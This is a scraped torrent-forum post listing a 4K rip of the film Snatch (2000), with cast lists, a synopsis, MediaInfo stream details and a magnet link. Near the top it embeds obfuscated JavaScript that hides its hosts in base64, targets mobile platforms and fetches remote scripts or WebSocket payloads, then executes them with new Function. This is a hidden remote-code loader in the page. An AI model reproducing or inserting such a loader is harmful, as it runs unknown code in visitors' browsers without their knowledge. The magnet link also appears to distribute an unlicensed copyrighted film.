偷拐抢骗[国语音轨/双语字幕]Snatch.2000.2160p.HDR.UHD.BluRay.TrueHD.7.1.Atmos.3Audio.x265-10bit-迅雷下载 15.44GB

版主小s 2月前 413

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 偷拐抢骗 / 边个够我姜(港) / 掠夺 / 贪得无厌 / 偷蒙拐骗

◎片 名 Snatch

◎年 代 2000

◎产 地 英国 / 美国

◎类 别 喜剧 / 犯罪

◎语 言 英语 / 俄语

◎上映日期 2000-09-01

◎IMDb链接 https://www.imdb.com/title/tt0208092/

◎豆瓣评分 8.5/10 (169585人评价)

◎豆瓣链接 https://movie.douban.com/subject/1301171/

◎片 长 104分钟

◎导 演 盖·里奇 Guy Ritchie (id:1025148)

◎编 剧 盖·里奇 Guy Ritchie (id:1025148)

◎演 员 本尼西奥·德尔·托罗 Benicio del Toro (id:1041005)

丹尼斯·法里纳 Dennis Farina (id:1031993)

维尼·琼斯 Vinnie Jones (id:1013804)

布拉德·皮特 Brad Pitt (id:1054452)

拉德·舍博德兹加 Rade Serbedzija (id:1025225)

杰森·斯坦森 Jason Statham (id:1049484)

阿兰·福德 Alan Ford (id:1088735)

Mike Reid Mike Reid (id:1143834)

罗比·基 Robbie Gee (id:1098633)

连尼·詹姆斯 Lennie James (id:1027381)

艾文·布莱纳 Ewen Bremner (id:1004679)

杰森·弗莱明 Jason Flemyng (id:1027179)

威廉·贝克 William Beck (id:1333293)

安迪·比克维奇 Andy Beckwith (id:1348311)

查尔斯·科克 Charles Cork (id:1313113)

索查·库萨克 Sorcha Cusack (id:1076776)

山姆·道格拉斯 Sam Douglas (id:1321473)

亚当·弗格蒂 Adam Fogerty (id:1082040)

戈尔迪 Goldie (id:1096372)

斯蒂芬·格拉汉姆 Stephen Graham (id:1025229)

大卫·勒格诺 Dave Legeno (id:1111773)

维利贝·托皮奇 Velibor Topic (id:1320241)

利亚姆·麦克马洪 Liam McMahon (id:1317838)

詹姆斯·沃伦 James Warren (id:1357923)

奧斯汀·德瑞奇 Austin Drage (id:1087913)

Dean Batchelor Dean Batchelor (id:1064539)

索尔·坎贝尔 Sol Campbell (id:1187374)

汤姆·德尔玛 Tom Delmar (id:1023271)

克里斯托弗·福什 Christopher Fosh (id:1045602)

盖·里奇 Guy Ritchie (id:1025148)

彼得·雷尼克 Peter Rnic (id:1042377)

克里斯·斯普鲁斯 Kriss Sprules (id:1232441)

马修·沃恩 Matthew Vaughn (id:1031852)

琼·安·布兰克 Jean Ann Black (id:1278717)

菲·哈蒙德 Fae Hammond (id:1285927)

威利·盖格尔 Willi Geiger (id:1306997)

汤姆·伍德 Tom Wood (id:1301233)

Jelena Stojanovic Jelena Stojanovic (id:1302270)

◎标 签 黑色幽默 / 英国 / 犯罪 / 喜剧 / GuyRitchie / 黑帮 / BradPitt / 英国电影

◎简 介

土耳其(杰森?斯坦森饰)是一位黑市拳击的经理人,不过他遇到了麻烦,本该参加比赛的选手被吉普赛人米奇(布拉德?皮特饰)一拳击倒。土耳其不得不选择在黑帮老大布里克(阿兰?福特饰)与吉塞人之间周旋,来获得生机。与此同时,四指弗兰克(本尼西奥?德尔?托罗饰)携带一颗86克拉的钻石来到伦敦,这件赃物引起了各路匪徒的兴趣,其中包括军火商老布(拉德?舍博德兹加饰)、杀手“子弹牙齿”托尼(维尼?琼斯饰)与黑人小混混维尼(罗比?吉饰)。这些心怀不轨的罪犯各自盘算着自己的完美计划,不想造化弄人,惊人的巧合引出一连串幽默的冷笑话。所有的一切都在伦敦的夜晚交织,究竟谁能够从中解脱?就在盖?瑞奇导演的《偷拐抢骗》中揭晓。

  1. General

  2. Unique ID : 286103822846376327056441403437916607603 (0xD73D978AD8347BEF1E65267D33E7D473)

  3. Complete name : Snatch.200[email protected]BBQDDQ.COM.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 15.4 GiB

  7. Duration : 1 h 42 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 21.5 Mb/s

  10. Movie name : Snatch 2000 2160p HDR UHD BluRay TrueHD 7.1 Atmos 3Audio [email protected]

  11. Encoded date : UTC 2021-07-17 08:08:53

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. HDR format : SMPTE ST 2086, HDR10 compatible

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 1 h 42 min

  22. Bit rate : 15.5 Mb/s

  23. Width : 3 840 pixels

  24. Height : 2 072 pixels

  25. Display aspect ratio : 1.85:1

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.081

  32. Stream size : 11.1 GiB (72%)

  33. Title : @HDSky

  34. Writing library : x265 - H.265/HEVC codec

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.2020

  39. Transfer characteristics : PQ

  40. Matrix coefficients : BT.2020 non-constant

  41. Mastering display color primaries : Display P3

  42. Mastering display luminance : min: 0.0020 cd/m2, max: 1000 cd/m2

  43. Maximum Content Light Level : 739 cd/m2

  44. Maximum Frame-Average Light Level : 331 cd/m2


  45. Audio #1

  46. ID : 2

  47. Format : MLP FBA 16-ch

  48. Format/Info : Meridian Lossless Packing FBA with 16-channel presentation

  49. Commercial name : Dolby TrueHD with Dolby Atmos

  50. Codec ID : A_TRUEHD

  51. Duration : 1 h 42 min

  52. Bit rate mode : Variable

  53. Bit rate : 4 687 kb/s

  54. Maximum bit rate : 7 680 kb/s

  55. Channel(s) : 8 channels

  56. Channel layout : L R C LFE Ls Rs Lb Rb

  57. Sampling rate : 48.0 kHz

  58. Frame rate : 1 200.000 FPS (40 SPF)

  59. Compression mode : Lossless

  60. Stream size : 3.36 GiB (22%)

  61. Title : English

  62. Language : English

  63. Default : Yes

  64. Forced : No

  65. Number of dynamic objects : 11

  66. Bed channel count : 1 channel

  67. Bed channel configuration : LFE


  68. Audio #2

  69. ID : 3

  70. Format : DTS

  71. Format/Info : Digital Theater Systems

  72. Codec ID : A_DTS

  73. Duration : 1 h 42 min

  74. Bit rate mode : Constant

  75. Bit rate : 754 kb/s

  76. Channel(s) : 6 channels

  77. Channel layout : C L R Ls Rs LFE

  78. Sampling rate : 48.0 kHz

  79. Frame rate : 93.750 FPS (512 SPF)

  80. Bit depth : 24 bits

  81. Compression mode : Lossy

  82. Stream size : 554 MiB (4%)

  83. Title : Mandarin

  84. Language : Chinese

  85. Default : No

  86. Forced : No


  87. Audio #3

  88. ID : 4

  89. Format : AC-3

  90. Format/Info : Audio Coding 3

  91. Commercial name : Dolby Digital

  92. Codec ID : A_AC3

  93. Duration : 1 h 42 min

  94. Bit rate mode : Constant

  95. Bit rate : 384 kb/s

  96. Channel(s) : 6 channels

  97. Channel layout : L R C LFE Ls Rs

  98. Sampling rate : 48.0 kHz

  99. Frame rate : 31.250 FPS (1536 SPF)

  100. Compression mode : Lossy

  101. Stream size : 282 MiB (2%)

  102. Title : Mandarin

  103. Language : Chinese

  104. Service kind : Complete Main

  105. Default : No

  106. Forced : No


  107. Text #1

  108. ID : 5

  109. Format : PGS

  110. Muxing mode : zlib

  111. Codec ID : S_HDMV/PGS

  112. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  113. Duration : 1 h 40 min

  114. Bit rate : 43.9 kb/s

  115. Count of elements : 3183

  116. Stream size : 31.6 MiB (0%)

  117. Title : ENG

  118. Language : English

  119. Default : Yes

  120. Forced : No


  121. Text #2

  122. ID : 6

  123. Format : PGS

  124. Muxing mode : zlib

  125. Codec ID : S_HDMV/PGS

  126. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  127. Duration : 1 h 42 min

  128. Bit rate : 29.5 kb/s

  129. Count of elements : 2754

  130. Stream size : 21.6 MiB (0%)

  131. Title : CHS

  132. Language : Chinese

  133. Default : No

  134. Forced : No


  135. Text #3

  136. ID : 7

  137. Format : PGS

  138. Muxing mode : zlib

  139. Codec ID : S_HDMV/PGS

  140. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  141. Duration : 1 h 38 min

  142. Bit rate : 27.3 kb/s

  143. Count of elements : 2748

  144. Stream size : 19.3 MiB (0%)

  145. Title : CHT

  146. Language : Chinese

  147. Default : No

  148. Forced : No


  149. Text #4

  150. ID : 8

  151. Format : PGS

  152. Muxing mode : zlib

  153. Codec ID : S_HDMV/PGS

  154. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  155. Duration : 1 h 38 min

  156. Bit rate : 67.8 kb/s

  157. Count of elements : 2667

  158. Stream size : 47.8 MiB (0%)

  159. Title : CHS&ENG

  160. Language : Chinese

  161. Default : No

  162. Forced : No


  163. Text #5

  164. ID : 9

  165. Format : PGS

  166. Muxing mode : zlib

  167. Codec ID : S_HDMV/PGS

  168. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  169. Duration : 1 h 38 min

  170. Bit rate : 68.8 kb/s

  171. Count of elements : 2667

  172. Stream size : 48.6 MiB (0%)

  173. Title : CHT&ENG

  174. Language : Chinese

  175. Default : No

  176. Forced : No


  177. Menu

  178. 00:00:00.000 : en:Chapter 01

  179. 00:06:53.120 : en:Chapter 02

  180. 00:12:46.932 : en:Chapter 03

  181. 00:16:26.567 : en:Chapter 04

  182. 00:25:12.928 : en:Chapter 05

  183. 00:29:58.046 : en:Chapter 06

  184. 00:36:22.762 : en:Chapter 07

  185. 00:41:34.240 : en:Chapter 08

  186. 00:48:11.221 : en:Chapter 09

  187. 00:53:08.434 : en:Chapter 10

  188. 00:59:01.119 : en:Chapter 11

  189. 01:07:41.931 : en:Chapter 12

  190. 01:13:19.353 : en:Chapter 13

  191. 01:19:04.363 : en:Chapter 14

  192. 01:22:17.431 : en:Chapter 15

  193. 01:28:07.407 : en:Chapter 16


TAGS 犯罪 喜剧

磁力链:
  • magnet:?xt=urn:btih:996C1CE65E60315055DE878C80C950999B2A4FC1
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回